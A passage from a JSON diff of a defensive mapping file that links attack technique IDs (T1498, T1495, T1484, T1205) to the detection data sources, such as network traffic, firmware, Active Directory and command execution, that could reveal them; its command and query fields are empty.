"IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null, + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1498", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1495", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1484", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object creation", + "description": "An active directory object was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "ad object" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object deletion", + "description": "An active directory object was deleted", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "ad object" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1205", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": 